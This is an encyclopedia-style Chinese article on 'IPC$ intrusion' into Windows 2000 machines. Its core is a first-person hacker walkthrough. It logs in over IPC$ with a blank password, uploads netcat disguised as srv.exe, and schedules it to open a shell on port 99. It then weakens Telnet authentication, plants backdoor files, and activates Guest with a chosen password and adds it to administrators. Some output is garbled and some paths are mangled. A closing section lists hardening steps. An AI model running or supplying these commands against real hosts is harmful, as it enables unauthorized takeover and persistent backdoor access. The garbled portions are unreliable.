IPC$入侵

IPC$入侵,即通過使用Windows 系統中默認啟動的IPC$共享,來達到侵略主機,獲得計算機控制權的入侵。此類入侵主要利用的是計算機使用者對計算機安全的知識缺乏,通常不會給計算機設定密碼或者密碼過於簡單,因此才導致被黑客的有機可乘。

基本介紹

  • 中文名:IPC$入侵
  • 系統:Windows
  • 途徑:IPC$共享
  • 目標:主機
IPC$入侵,範例,新程式介紹,掃描IPC$主機,解惑,建立ipc$連線的作用,如何防範ipc$入侵,

IPC$入侵

IPC$是Windows的默認共享。其實,這個共享並沒有什麼漏洞。
我們可以用主機的管理員用戶名和密碼連線。
問題就出在管理員密碼了。直至現在為止,世界上起碼有20%的人,把主機密碼設定為“空”或者“123”等簡單密碼。
我們要尋找這些主機十分簡單。只需要一個程式就可以。
下面,我會把以前寫的一篇IPC$入侵文章,進行小小的修改。

範例

本次範例需要的系統及程式情況如下:
作業系統:Windows 2000
對方作業系統:Windows 2000
程式(一):流光 IV 國際版 (Fluxay Release IV Build 2914 International Edition For NT/2000/XP)
程式(二):Srv.exe
程式(三):Ntlm.exe
本機IP:127.0.0.1
測試IP:127.0.0.25

新程式介紹

Srv.exe:實際上是NetCat,這裡改名為Srv.exe。用於在主機建立一個連線埠為99的shell。
Ntlm.exe:是小榕寫的一個程式,用於修改Windows 2000 Telnet Servery身份驗證的方式。
關於掃描的方法,在流光的help目錄有一個ipc.mht的檔案。裡面有使用說明。

掃描IPC$主機

假設,我們掃描了一台IPC$主機:127.0.0.25
用戶名:davis
密碼:空
“//”後是註解。
Microsoft Windows 2000 [Version 5.00.2195]
(C) 著作權所有 1985-1998 Microsoft Corp.
D:>net use \\127.0.0.25\ipc$ "" /user:"davis" //這是我用流光掃到的密碼~~~我們就拿它開刀吧~!
命令成功完成。
D:>copy srv.exe \\127.0.0.25\ipc$ //先複製srv.exe上去,在流光的Tools目錄就有。
已複製 1 個檔案。
D:>net time \\127.0.0.25 //查查時間。
\\127.0.0.25 的當前時間是 2001/1/17 上午 10:48
命令成功完成。
D:>at \\127.0.0.25 10:50 srv.exe //用at命令啟動srv.exe吧~!(這裡設定的時間要比主機時間快)
關於at命令:at是讓電腦在指定的時間做指定的事情的命令(比如運行程式)
新加了一項作業,其作業 ID = 1
D:>net time \\127.0.0.25//再查查夠時間沒有?!噢~~夠了~
127.0.0.25 的當前時間是 2001/1/17 上午 10:51
命令成功完成。
D:>telnet 127.0.0.25 99 //我們telnet吧,注意連線埠是99喔~
Microsoft Windows 2000 [?セ 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.
C:> //噢~~成功了!
D:>copy ntlm.exe \\127.0.0.25$//我們再開一個DOS視窗,把ntlm.exe上傳到主機上。(也是在流光流光的Tools目錄)
已複製 1 個檔案。
Microsoft Windows 2000 [?セ 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.
C:>ntlm //我們輸入ntlm啟動吧。
ntlm
Windows 2000 Telnet Dump, by Assassin, All Rights Reserved.
Done! //OK~:)
C:>
C:>net start telnet //然後直接用net start telnet啟動telnet.
net start telnet
Telnet 獮叭タ?幣笆 .
Telnet 獮叭?竒幣笆Θ?? //直覺告訴我成功了~!(沒辦法,這裡是亂碼
C:>
C:> //這個視窗已經沒用了,關了他吧!
D:>telnet 127.0.0.25 //我們在開一個DOS視窗,然後telnet上去。
NTLM Authentication failed due to insufficient credentials. Please login with
clear text username and password
Microsoft (R) Windows (TM) Version 5.00 (Build 2195)
Welcome to Microsoft Telnet Service
Telnet Server Build 5.00.99201.1
login: davis //輸入用戶名
password: //輸入密碼(密碼是空的,所以不用輸入)
*===============================================================
舧?ㄏノ Microsoft Telnet Server?
*===============================================================
C:>copy c:.exe c://留個後門。
╰參тぃ??﹚?郎??
C:>copy c:.exe c:.exe //再留多個後門。
狡籹? 1 ?郎??
C:>net user guest /active:yes //將Guest用戶激活.
??磅︽Θ??
C:>net user guest cnhack //將Guest的密碼改為cnhack,或者你要設定的密碼。
??磅︽Θ??
C:>net localgroup administrators guest /add //將Guest變為Administrator。^_^
??磅︽Θ??
如果管理員把密碼更改,而guest帳號沒改變的話,下次我們可以用guest再次訪問這台計算機。(不過許可權就比較小了。——
後門夠多了吧~~~~呵呵~~一個跳板就做好了!
C:>

解惑

1)IPC連線是Windows NT及以上系統中特有的遠程網路登入功能,其功能相當於Unix中的Telnet,由於IPC$功能需要用到Windows NT中的很多DLL函式,所以不能在Windows 9.x中運行。
也就是說只有nt/2000/xp才可以建立ipc$連線,98/me是不能建立ipc$連線的(但有些朋友說在98下能建立空的連線,不知道是真是假,不過現在都2003年了,建議98的同志換一下系統吧,98不爽的)。
2)即使是空連線也不是100%都能建立成功,如果對方關閉了ipc$共享,你仍然無法建立連線。
3)並不是說建立了ipc$連線就可以查看對方的用戶列表,因為管理員可以禁止導出用戶列表。

建立ipc$連線的作用

就像上面所說的,即使你建立了一個空的連線,你也可以獲得不少的信息(而這些信息往往是入侵中必不可少的),訪問部分共享,如果你能夠以某一個具有一定許可權的用戶身份登入的話,那么你就會得到相應的許可權,顯然,如果你以管理員身份登入,嘿嘿,就不用我在多說了吧,what u want,u can do!!
(基本上可以總結為獲取目標信息、管理目標進程和服務,上傳木馬並運行,如果是2000server,還可以考慮開啟終端服務方便控制.怎么樣?夠厲害吧!)
不過你也不要高興的太早,因為管理員的密碼不是那么好搞到的,雖然會有一些傻傻的管理員用空口令或者弱智密碼,但這畢竟是少數,而且現在不比從前了,隨著人們安全意識的提高,管理員們也愈加小心了,得到管理員密碼會越來越難的:(
因此今後你最大的可能就是以極小的許可權甚至是沒有許可權進行連線,你會慢慢的發現ipc$連線並不是萬能的,甚至在主機不開啟ipc$共享時,你根本就無法連線.
所以我認為,你不要把ipc$入侵當作終極武器,不要認為它戰無不勝,它就像是足球場上射門前的傳球,很少會有致命一擊的效果,但卻是不可缺少的,我覺得這才是ipc$連線在hack入侵中的意義所在.

如何防範ipc$入侵

1禁止空連線進行枚舉
首先運行regedit,找到如下組建[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous = DWORD的鍵值改為:00000001(如果設定為2的話,有一些問題會發生,比如一些WIN的服務出現問題等等)
1)察看本地共享資源
運行-cmd-輸入net share
2)刪除共享(每次輸入一個)
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete(如果有e,f,……可以繼續刪除)
3)停止server服務
net stop server /y (重新啟動後server服務會重新開啟)
4)修改註冊表
運行-regedit
server版:找到如下主鍵[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareServer(DWORD)的鍵值改為:00000000。
pro版:找到如下主鍵[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareWks(DWORD)的鍵值改為:00000000。
如果上面所說的主鍵不存在,就新建(右擊-新建-雙位元組值)一個主健再改鍵值。
3永久關閉ipc$和默認共享依賴的服務:lanmanserver即server服務
控制臺-管理工具-服務-找到server服務(右擊)-屬性-常規-啟動類型-已禁用
4安裝防火牆(選中相關設定),或者連線埠過濾(濾掉139,445等),或者用新版本的最佳化大師
5避免設定弱密碼,防止通過ipc$窮舉密碼

相關詞條

熱門詞條

聯絡我們